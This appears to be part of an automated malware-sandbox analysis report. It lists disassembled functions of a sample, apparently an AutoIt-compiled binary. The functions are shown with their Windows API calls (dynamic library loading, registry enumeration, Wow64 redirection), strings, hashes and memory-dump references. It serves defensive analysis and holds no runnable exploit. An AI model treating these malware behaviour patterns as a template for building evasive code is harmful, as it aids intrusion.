                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseExecuteHandleProcessShell_wcslen
                                                  • String ID: <$@
                                                  • API String ID: 146682121-1426351568
                                                  • Opcode ID: f346fa7271e7d44f427091de876a38bdeafe3ab649ce3eb6136fcc36ba7b909d
                                                  • Instruction ID: 6941f02b8fb52a8922a494bf5431bcdc14ef3f7873fce0e5478c3ff923996805
                                                  • Opcode Fuzzy Hash: f346fa7271e7d44f427091de876a38bdeafe3ab649ce3eb6136fcc36ba7b909d
                                                  • Instruction Fuzzy Hash: 76714B71A00619DFCF14DF94C484A9EBBF1BF48314F088499E856AB3A2D774ED85CB91
                                                  Function 005F719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 005F7206
                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 005F723C
                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 005F724D
                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 005F72CF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                  • String ID: DllGetClassObject
                                                  • API String ID: 753597075-1075368562
                                                  • Opcode ID: 9bcfed1eea19e707b895bdc777edbc32986f89ee6593343d33497146352ecb6a
                                                  • Instruction ID: eb4c10a65b78c2b6f75e0339df5f41994d1c201796a88cdf507d1c4f36b87c32
                                                  • Opcode Fuzzy Hash: 9bcfed1eea19e707b895bdc777edbc32986f89ee6593343d33497146352ecb6a
                                                  • Instruction Fuzzy Hash: 4E41827560460C9FDB15CF54C885AAA7FAAFF48310F1484ADBE059F20AD7B4DA45CBA0
                                                  Function 0061C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                  • API String ID: 176396367-4004644295
                                                  • Opcode ID: 20b21ec4d4247d1500485d366d656ca42407b419e059c448cc185f4c37686a60
                                                  • Instruction ID: 7bbad72bd1c95e2593e631ef3b565eff2a0793d4234bf0c265ce3b84d5943c35
                                                  • Opcode Fuzzy Hash: 20b21ec4d4247d1500485d366d656ca42407b419e059c448cc185f4c37686a60
                                                  • Instruction Fuzzy Hash: 3231F532A8016A8ACB22DF6D98501FE3793AFA1760F1D4029EC45AB345E671CEC4D3A0
                                                  Function 00622F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00622F8D
                                                  • LoadLibraryW.KERNEL32(?), ref: 00622F94
                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00622FA9
                                                  • DestroyWindow.USER32(?), ref: 00622FB1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DestroyLibraryLoadWindow
                                                  • String ID: SysAnimate32
                                                  • API String ID: 3529120543-1011021900
                                                  • Opcode ID: 0b56119404695a5b5d45ad81eea0e450f3b694e63fe560751ff785383ff0637e
                                                  • Instruction ID: a977f09629e694ca23ea40aca9893676d63a11df15510380bac3d603eedec3db
                                                  • Opcode Fuzzy Hash: 0b56119404695a5b5d45ad81eea0e450f3b694e63fe560751ff785383ff0637e
                                                  • Instruction Fuzzy Hash: D421DE71240A16BBEB208F64EDA0EFB37BAEB59364F100218F910D2290D771DC419B60
                                                  Function 005B4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005B4D1E,005C28E9,?,005B4CBE,005C28E9,006588B8,0000000C,005B4E15,005C28E9,00000002), ref: 005B4D8D
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005B4DA0
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,005B4D1E,005C28E9,?,005B4CBE,005C28E9,006588B8,0000000C,005B4E15,005C28E9,00000002,00000000), ref: 005B4DC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 521b3490f0070a175797f88f0f9e7fd6d40a0032cd54ad0f1c53813fae720834
                                                  • Instruction ID: 41157e08c17d7bcaad00c10099837af6fa9d938f488724028c0dab0322080484
                                                  • Opcode Fuzzy Hash: 521b3490f0070a175797f88f0f9e7fd6d40a0032cd54ad0f1c53813fae720834
                                                  • Instruction Fuzzy Hash: 4EF04F34A40608BFDB219F94DC49BEEBFBAEF44762F0040A4F805A22A1CB316955CED1
                                                  Function 005ED3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 005ED3AD
                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 005ED3BF
                                                  • FreeLibrary.KERNEL32(00000000), ref: 005ED3E5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: GetSystemWow64DirectoryW$X64
                                                  • API String ID: 145871493-2590602151
                                                  • Opcode ID: b58e45c707b3324e1054785e418c01cbd50aecf9bf3ac8a2bd7e2ce6e23664b1
                                                  • Instruction ID: 4c143202dea9d3d9fe341e1a69db6750cddb1a8c04d794b7ceb3d66d5988c941
                                                  • Opcode Fuzzy Hash: b58e45c707b3324e1054785e418c01cbd50aecf9bf3ac8a2bd7e2ce6e23664b1
                                                  • Instruction Fuzzy Hash: 9FF05C35805D608FC3389712CC5C91D3F35BF05701BA48855F982F6010DB30CC44C6B2
                                                  Function 00594E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00594EDD,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E9C
                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00594EAE
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00594EDD,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594EC0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                  • API String ID: 145871493-3689287502
                                                  • Opcode ID: 9bdd330a40bcd9bb14e29dba615567d34db1ce0cbf66314b285e753176056886
                                                  • Instruction ID: 7de47f91a636e95e6df57bf437ef6cc30dd1a5d9341803cba2a4a9624e6b1581
                                                  • Opcode Fuzzy Hash: 9bdd330a40bcd9bb14e29dba615567d34db1ce0cbf66314b285e753176056886
                                                  • Instruction Fuzzy Hash: B9E08635A01D325BD7311725AC1DE5F695DBF81F73B050115FC01D2200DB60CD0788E2
                                                  Function 00594E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D3CDE,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E62
                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00594E74
                                                  • FreeLibrary.KERNEL32(00000000,?,?,005D3CDE,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E87
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                  • API String ID: 145871493-1355242751
                                                  • Opcode ID: b24d0a3a025a1de636af186a0e731a7b105986df489ea47978fbf0fc3f35352e
                                                  • Instruction ID: 9e9a8c200c825beeaeff022acbc51aa0d2e6433eaba154c7a59bea08c5f95424
                                                  • Opcode Fuzzy Hash: b24d0a3a025a1de636af186a0e731a7b105986df489ea47978fbf0fc3f35352e
                                                  • Instruction Fuzzy Hash: 3BD08C32902E31578A321B246C0DD8F2A1EBF85B623064110B800A2210CB24CD13C9D1
                                                  Function 0061A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 0061A427
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0061A435
                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0061A468
                                                  • CloseHandle.KERNEL32(?), ref: 0061A63D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                  • String ID:
                                                  • API String ID: 3488606520-0
                                                  • Opcode ID: 0df555a2b05203119153b28c3ee1a91368b0b665c667dfa05756060948afa1eb
                                                  • Instruction ID: 03f1a461038498c734cecf8846c996e7f227120e66b709301c6e384550146a10
                                                  • Opcode Fuzzy Hash: 0df555a2b05203119153b28c3ee1a91368b0b665c667dfa05756060948afa1eb
                                                  • Instruction Fuzzy Hash: 7FA181716043019FDB20DF24D886B6ABBE6BF88714F14885DF5599B3D2D770EC418B92
                                                  Function 005FE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005FDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005FCF22,?), ref: 005FDDFD
                                                    • Part of subcall function 005FDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005FCF22,?), ref: 005FDE16
                                                    • Part of subcall function 005FE199: GetFileAttributesW.KERNEL32(?,005FCF95), ref: 005FE19A
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 005FE473
                                                  • MoveFileW.KERNEL32(?,?), ref: 005FE4AC
                                                  • _wcslen.LIBCMT ref: 005FE5EB
                                                  • _wcslen.LIBCMT ref: 005FE603
                                                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 005FE650
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                  • String ID:
                                                  • API String ID: 3183298772-0
                                                  • Opcode ID: 4175f3291c9eca0cffbe1822d238e028c07871e9f085ed51a03c4899ecf649d2
                                                  • Instruction ID: 0442cc9ae895ab270bfdf96c62341bada9f2cb5e3588533d26449c6b8e4bb169
                                                  • Opcode Fuzzy Hash: 4175f3291c9eca0cffbe1822d238e028c07871e9f085ed51a03c4899ecf649d2
                                                  • Instruction Fuzzy Hash: 175152B24087495BC724EB94DC859EF7BECBFC4340F00491EF689D3151EE79A5888766
                                                  Function 0061B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                    • Part of subcall function 0061C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061B6AE,?,?), ref: 0061C9B5
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061C9F1
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA68
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA9E
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061BAA5
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0061BB00
                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0061BB63
                                                  • RegCloseKey.ADVAPI32(?,?), ref: 0061BBA6
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0061BBB3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                  • String ID:
                                                  • API String ID: 826366716-0
                                                  • Opcode ID: b9eacdf2451a05dc63a5cd9d622a179a049ae3f4de4e96578e287f6abceef1b7
                                                  • Instruction ID: 5a5b2bb42ac8cf80f5439e7d8e9adc566b57454f5d5f92614037c750e230448d
                                                  • Opcode Fuzzy Hash: b9eacdf2451a05dc63a5cd9d622a179a049ae3f4de4e96578e287f6abceef1b7
                                                  • Instruction Fuzzy Hash: A761B631208241EFD714DF14C494EAABBE6FF84318F18955CF4994B2A2DB31ED45CB92
                                                  Function 005F8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 005F8BCD
                                                  • VariantClear.OLEAUT32 ref: 005F8C3E
                                                  • VariantClear.OLEAUT32 ref: 005F8C9D
                                                  • VariantClear.OLEAUT32(?), ref: 005F8D10
                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 005F8D3B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Variant$Clear$ChangeInitType
                                                  • String ID:
                                                  • API String ID: 4136290138-0
                                                  • Opcode ID: b26a372de3f0e562c45a580544565477ccf7d46ba17705abe72a8cc25226e931
                                                  • Instruction ID: 329c1407ba8d5442b296f911493e81a11d1881a546508a0ae47551a0bdf18bf1
                                                  • Opcode Fuzzy Hash: b26a372de3f0e562c45a580544565477ccf7d46ba17705abe72a8cc25226e931
                                                  • Instruction Fuzzy Hash: FB517BB5A00619EFCB10CF68C884AAABBF9FF89310B158559FA05DB354E734E911CF90
                                                  Function 00608AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00608BAE
                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00608BDA
                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00608C32
                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00608C57
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00608C5F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$SectionWrite$String
                                                  • String ID:
                                                  • API String ID: 2832842796-0
                                                  • Opcode ID: 0e2f01b9ad99131bd0bcbe0ae4078d78cafc1a373c969db3b4777411d02e3114
                                                  • Instruction ID: 777867c581f4ba736c7313645a5dd693a2e8a396496d8db744e8695373bbb92b
                                                  • Opcode Fuzzy Hash: 0e2f01b9ad99131bd0bcbe0ae4078d78cafc1a373c969db3b4777411d02e3114
                                                  • Instruction Fuzzy Hash: 0F513C35A00619DFDF15DF64C884AAEBBF5BF49314F088059E849AB3A2DB31ED51CB90
                                                  Function 00618EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00618F40
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00618FD0
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00618FEC
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00619032
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00619052
                                                    • Part of subcall function 005AF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00601043,?,753CE610), ref: 005AF6E6
                                                    • Part of subcall function 005AF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,005EFA64,00000000,00000000,?,?,00601043,?,753CE610,?,005EFA64), ref: 005AF70D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                  • String ID:
                                                  • API String ID: 666041331-0
